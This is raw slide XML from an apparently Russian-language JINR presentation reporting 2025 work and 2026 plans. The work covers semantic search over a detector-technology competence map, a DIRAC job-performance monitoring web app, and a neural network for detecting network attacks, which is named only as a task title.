              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Сервис доступен всем пользователям, имеющим учетную запись в системе JINR SSO (доступен по ссылке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>https://detectors.jinr.ru)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx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ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>С начала 2025 г. количество пользователей увеличилось со 123 пользователей до 201, количество обращений к веб-сервису превышает 640 тысяч.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AB992948-61F8-4095-B122-415097E0B525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FCAE4841-6F45-4D66-8E17-9C3E8498CA42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FBE4ADC-6B48-4AF0-AC5B-009264471657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22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BBA26E-4E1C-4E71-BEDF-CAAB9F53E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51" y="624240"/>
            <a:ext cx="4632495" cy="557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07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0" y="-46440"/>
            <a:ext cx="12189960" cy="67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2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Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="22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</a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="22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Семантический поиск по накопленной базе</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="22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pic>
        <p:nvPicPr>
          <p:cNvPr id="430" name="Рисунок 42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000" y="566280"/>
            <a:ext cx="5673960" cy="5652000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="431" name="Рисунок 430"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="56160" y="662400"/>
            <a:ext cx="6436440" cy="3048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2" name="Рисунок 431"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="77400" y="3258720"/>
            <a:ext cx="6438240" cy="294732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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCC32CC9-0D1C-4A02-AC6B-D25B800D70D8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0B5BDF3B-C57C-4709-B381-8CEAFE5EE8B5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4A4A7338-2AF6-44D6-8A06-EED1CB4821CD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23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0" y="-46440"/>
            <a:ext cx="12189960" cy="67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2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Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="22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</a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="22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Семантический поиск по накопленной базе</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="22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pic>
        <p:nvPicPr>
          <p:cNvPr id="431" name="Рисунок 430"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="56160" y="662400"/>
            <a:ext cx="6436440" cy="3048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2" name="Рисунок 431"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="77400" y="3258720"/>
            <a:ext cx="6438240" cy="294732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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCC32CC9-0D1C-4A02-AC6B-D25B800D70D8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0B5BDF3B-C57C-4709-B381-8CEAFE5EE8B5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4A4A7338-2AF6-44D6-8A06-EED1CB4821CD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24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874582-0CC3-4FBA-961A-2665A9163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600" y="594456"/>
            <a:ext cx="3932319" cy="19803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5290C3-61CE-4336-AF76-3B3E2ACD2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130"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889042" y="2278827"/>
            <a:ext cx="4225558" cy="3927213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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54F5E3B-4C72-4AC6-8BBA-54DB43D427FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7747279" y="3429000"/>
            <a:ext cx="0" cy="257991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68D9DAD-388E-4F56-81F8-16E4BFE48F60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6589085" y="3371966"/>
            <a:ext cx="1203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most similar</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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F7DF63-24DB-4BF7-A667-24158F0CA6DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6589084" y="5712986"/>
            <a:ext cx="1185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least similar</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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1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Выполненные работы за 2025 год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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107640" y="666360"/>
            <a:ext cx="11806200" cy="5508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2500" lnSpcReduction="9999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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Разработка и тестирование нейронной сети для обнаружения сетевых атак к веб-сервисам ОИЯИ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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Исследование методов агрегации векторных представлений текстов различных семантических пространств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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Работа над созданием алгоритма семантического поиска информации в базе данных цифровой карты компетенций по детекторным и ускорительным технологиям ОИЯИ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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Развитие веб-сервиса мониторинга производительности задач на ресурсах, интегрированных в распределенную инфраструктуру DIRAC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D2B49-5B8B-416E-B8F0-DBEBD99C109C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9D33B85-29C1-4DA6-AA7A-E25F9D56DC47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F42110C-3093-4D9C-9254-5945F7EE305F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25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720" y="0"/>
            <a:ext cx="12189960" cy="64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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>п</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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рототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC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38" name="Группа 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="907560" y="603360"/>
            <a:ext cx="10376280" cy="5650920"/>
            <a:chOff x="907560" y="603360"/>
            <a:chExt cx="10376280" cy="5650920"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="439" name="Рисунок 2"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="907560" y="603360"/>
              <a:ext cx="10376280" cy="56509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40" name="Рисунок 3"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2575080" y="963000"/>
              <a:ext cx="8671320" cy="38455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6" name="Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5348C1-C3E1-4CBB-8BA2-41A08B5DEDA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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0471A33D-0494-41C6-81F4-382766E72C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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B341019-CD04-45B7-9FB7-72AF5FA35B54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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26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720" y="0"/>
            <a:ext cx="12189960" cy="64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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>п</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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рототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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Пример практического применения</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="18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pic>
        <p:nvPicPr>
          <p:cNvPr id="443" name="Рисунок 442"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="74160" y="616680"/>
            <a:ext cx="12191760" cy="5721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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E242D21A-9723-42D7-91EB-AD5563F471F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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688BB03F-2175-405B-9054-65E4A72D1BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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8F8613D-971B-4422-B3E5-7D27F6927F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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27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720" y="0"/>
            <a:ext cx="12189960" cy="64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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>п</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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рототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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Пример практического применения</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="18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E242D21A-9723-42D7-91EB-AD5563F471F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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688BB03F-2175-405B-9054-65E4A72D1BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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8F8613D-971B-4422-B3E5-7D27F6927F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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28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610AA1-8EC0-467F-9003-2F29EF99D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641"/>
            <a:ext cx="12192000" cy="571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26E4BF-6B0B-4826-8456-A14A8AB364F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8277971" y="1211801"/>
            <a:ext cx="3837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Экземпляр приложения, установленный в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>IHEP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6704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720" y="0"/>
            <a:ext cx="12189960" cy="64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none" strike="noStrike" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>п</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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рототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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Пример практического применения</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="18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pic>
        <p:nvPicPr>
          <p:cNvPr id="446" name="Рисунок 445"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="59040" y="641160"/>
            <a:ext cx="6309360" cy="4008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7" name="Рисунок 446"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6203160" y="3145680"/>
            <a:ext cx="5988960" cy="3108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8" name="Рисунок 447"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8025480" y="641160"/>
            <a:ext cx="4100760" cy="2682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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA0C3BD-F69E-42A9-A5E6-2AECA846D824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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FA0871C-26F8-4D22-A2D1-F66F3EB8D769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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91712C6-242F-4A73-AC3E-03F521058626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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29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Задачи, объявленные на 2025 год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107640" y="666360"/>
            <a:ext cx="11806200" cy="5508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2500" lnSpcReduction="19999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+mn-lt"/>
              </a:rPr>
              <a:t> Проектирование и разработка интеллектуального алгоритма анализа безопасности сетевых подключений к внутренним ресурсам, размещенным в облачной среде ЛИТ ОИЯИ </a:t>
            </a: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+mn-lt"/>
              </a:rPr>
              <a:t>(в рамках темы 06-6-1118-2014/2030 “Многофункциональный информационно-вычислительный комплекс (МИВК)” Проблемно-тематического плана ОИЯИ)</a:t>
            </a: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+mn-lt"/>
              </a:rPr>
              <a:t>.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+mn-lt"/>
              </a:rPr>
              <a:t> Разработка методов искусственного интеллекта в рамках развития многоцелевой программно-аппаратной платформы аналитики Больших данных для интеллектуальной обработки текстов, включая алгоритмы определения семантической близости между текстами, извлечение именованных сущностей и генерацию текстов с заданными характеристиками, с целью повышения эффективности работы с технической и научной информацией </a:t>
            </a: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+mn-lt"/>
              </a:rPr>
              <a:t>(в рамках темы 06-6-1118-2014/2030 “Многофункциональный информационно-вычислительный комплекс (МИВК)” Проблемно-тематического плана ОИЯИ)</a:t>
            </a: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+mn-lt"/>
              </a:rPr>
              <a:t>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6C078-A8CE-4308-99CF-DBFE313FC9ED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4C734DC5-10C2-4481-B757-71BE3EC86858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BC530EF2-553A-4AD6-89A4-D66D0FFCD0BB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3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600" b="1" u="none" strike="noStrike" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>п</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="16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рототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1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Проблема оценки производительности многоядерных задач (выявлена в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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IHEP, 2024)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1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 и предлагаемое решение</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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pic>
        <p:nvPicPr>
          <p:cNvPr id="451" name="Рисунок 450"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7539840" y="3143880"/>
            <a:ext cx="4651560" cy="3100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2" name="Прямоугольник 451"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14760" y="3423110"/>
            <a:ext cx="7187760" cy="16649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501750" lvl="1" indent="-285750" algn="just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b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Время выполнения задачи в секундах (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>WallTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>, измеряемое системой DIRAC.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="501750" lvl="1" indent="-285750" algn="just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b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>CPU Time - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>фактическое время</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>, которое задача провела на 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</a:rPr>
              <a:t>CP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="501750" lvl="1" indent="-285750" algn="just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b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Отношение CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>WallTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Efficiency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>, служащее показателем того, насколько интенсивно использовались CPU.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="453" name="Рисунок 452"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7541640" y="544680"/>
            <a:ext cx="4649760" cy="2747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4" name="Прямоугольник 453"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7540200" y="5601600"/>
            <a:ext cx="4651560" cy="64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3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Основные результаты работы доложены 18.09.2025 г. на 11-ом рабочем совещании пользователей DIRAC в г. Пекин, КНР.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455" name="Таблица 454"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2542383365"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="465840" y="1225620"/>
          <a:ext cx="4945680" cy="1385280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1152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6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System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Single core</a:t>
                      </a:r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Multi core</a:t>
                      </a:r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u="none" strike="noStrike" dirty="0" err="1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WallTime</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="18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5 00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0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="18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</a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="36000" marT="36000" marB="36000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5 00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0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="18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</a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="36000" marT="36000" marB="36000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CPU Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="18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i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(4 920)</a:t>
                      </a:r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33 876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Efficiency</a:t>
                      </a:r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i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(4 920 / 5 000)</a:t>
                      </a:r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</a:rPr>
                        <a:t>33 876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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B5174F9-FE35-49D9-97C9-2F5B5E694D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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2D3AA2A4-1874-4B71-8F1C-D60C1C2F42D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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014272B-A218-493A-8AF9-217441533E49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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30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600" b="1" u="none" strike="noStrike" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>п</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="16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рототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1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Проблема оценки производительности многоядерных задач (выявлена в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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IHEP, 2024)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1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 и предлагаемое решение</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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6B5174F9-FE35-49D9-97C9-2F5B5E694D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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2D3AA2A4-1874-4B71-8F1C-D60C1C2F42D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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014272B-A218-493A-8AF9-217441533E49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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31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AFF82-EFA3-43B7-80CE-B9D67013D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930"/>
            <a:ext cx="12192000" cy="56881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0B0790-7C3A-4D52-9619-94B7E01CCA74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8277971" y="1211801"/>
            <a:ext cx="3837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Экземпляр приложения, установленный в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>IHEP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843322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План работ на 2026 г.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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="876239"/>
